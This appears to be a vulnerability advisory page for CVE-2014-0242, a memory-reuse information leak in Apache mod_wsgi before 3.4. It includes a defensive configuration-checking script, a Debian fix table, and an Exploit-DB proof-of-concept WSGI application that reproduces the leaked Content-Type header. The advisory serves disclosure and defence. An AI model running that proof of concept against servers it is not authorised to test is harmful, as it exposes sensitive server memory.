CVE-2014-0242
Description
The mod_wsgi module before 3.4 for Apache, when used in embedded mode, might allow remote attackers to obtain sensitive information via the Content-Type header, which is generated from memory that may have been freed and then overwritten by a separate thread.
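The two conditions in the description (a release before 3.4, and embedded mode) can be checked against a host's Apache configuration. The following is an added example, not code from this page or from the mod_wsgi project. It assumes the configuration is available as one text blob, looks only at server and VirtualHost scope (no Include, Directory or Location handling), and its function names and sample configuration are constructed for illustration.

```python
import re

FIXED = (3, 4)  # first fixed upstream release named in the description

def is_before_fix(version):
    """True if the upstream part of a version such as '3.3-4' is below 3.4."""
    m = re.match(r"\s*(\d+(?:\.\d+)*)", version)
    if not m:
        raise ValueError("unrecognised version: %r" % version)
    parts = tuple(int(p) for p in m.group(1).split("."))
    return parts + (0,) * (len(FIXED) - len(parts)) < FIXED

def embedded_mounts(conf_text):
    """URL paths mounted with WSGIScriptAlias and served in embedded mode."""
    server = {"group": None, "mounts": []}
    scopes, cur = [server], server
    for raw in conf_text.splitlines():
        words = raw.split()
        if not words or words[0].startswith("#"):
            continue
        key = words[0].lower()  # Apache directive names are case-insensitive
        if key.startswith("<virtualhost"):
            cur = {"group": None, "mounts": []}
            scopes.append(cur)
        elif key.startswith("</virtualhost"):
            cur = server
        elif key == "wsgiprocessgroup" and len(words) > 1:
            cur["group"] = words[1]
        elif key == "wsgiscriptalias" and len(words) > 2:
            opts = dict(w.split("=", 1) for w in words[3:] if "=" in w)
            cur["mounts"].append((words[1], opts.get("process-group")))
    found = []
    for scope in scopes:
        for url, own_group in scope["mounts"]:
            group = own_group or scope["group"] or server["group"]
            if group in (None, "%{GLOBAL}"):  # not delegated to a daemon group
                found.append(url)
    return found

def exposed_mounts(version, conf_text):
    """Mounts meeting both conditions: version before 3.4 and embedded mode."""
    return embedded_mounts(conf_text) if is_before_fix(version) else []

# Constructed sample configuration (paths and names are hypothetical).
SAMPLE_CONF = """
WSGIDaemonProcess site user=www-data threads=15
WSGIScriptAlias /legacy /srv/legacy/app.wsgi
<VirtualHost *:80>
    WSGIScriptAlias /shop /srv/shop/app.wsgi
    WSGIProcessGroup site
</VirtualHost>
<VirtualHost *:8080>
    WSGIScriptAlias /admin /srv/admin/app.wsgi process-group=site
    WSGIScriptAlias /status /srv/status/app.wsgi
</VirtualHost>
"""
```

An empty result for a pre-3.4 install means no embedded-mode mount was found in the scopes this heuristic reads, so configurations split across included files need to be concatenated first.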
Mitigations
No mitigations published for this CVE yet.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Apache mod_wsgi - Information Disclosure
source: https://www.securityfocus.com/bid/67534/info
mod_wsgi is prone to a remote information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.
```python
import functools
import threading
import time
import random


# Background thread that continuously allocates and discards short strings,
# so memory released elsewhere in the process is reused quickly.
def run(*args):
    while True:
        items = []
        for i in range(1000):
            items.append((int(random.random()*20)*'X'))
        time.sleep(0.00001)


thread = threading.Thread(target=run)
thread.start()


# The Content-Type value is built at call time, so every response
# carries a newly created string object.
def headers():
    return [('Content-Type', 'text/plain'.upper().lower())]


def response():
    yield 'Hello World!\n'


_content_type_cache = {}


# Wrapper that stores each Content-Type value in a module-level dict,
# which keeps the string object referenced for the life of the process.
def intern_content_type(application):
    @functools.wraps(application)
    def _wrapper(environ, start_response):
        def _start_response(status, headers, *args):
            _headers = []
            for header, value in headers:
                if header.lower() == 'content-type':
                    value = _content_type_cache.setdefault(value, value)
                _headers.append((header, value))
            return start_response(status, _headers, *args)
        return application(environ, _start_response)
    return _wrapper


# The wrapper above is left disabled in this script.
#@intern_content_type
def application(environ, start_response):
    status = '200 OK'
    start_response(status, headers())
    return response()
```
OS impact
Debian: fixed in 5 releases
| Version | Status | Fixed in |
|---|---|---|
| trixie | Fixed | 3.4-3 |
| sid | Fixed | 3.4-3 |
| forky | Fixed | 3.4-3 |
| bullseye | Fixed | 3.4-3 |
| bookworm | Fixed | 3.4-3 |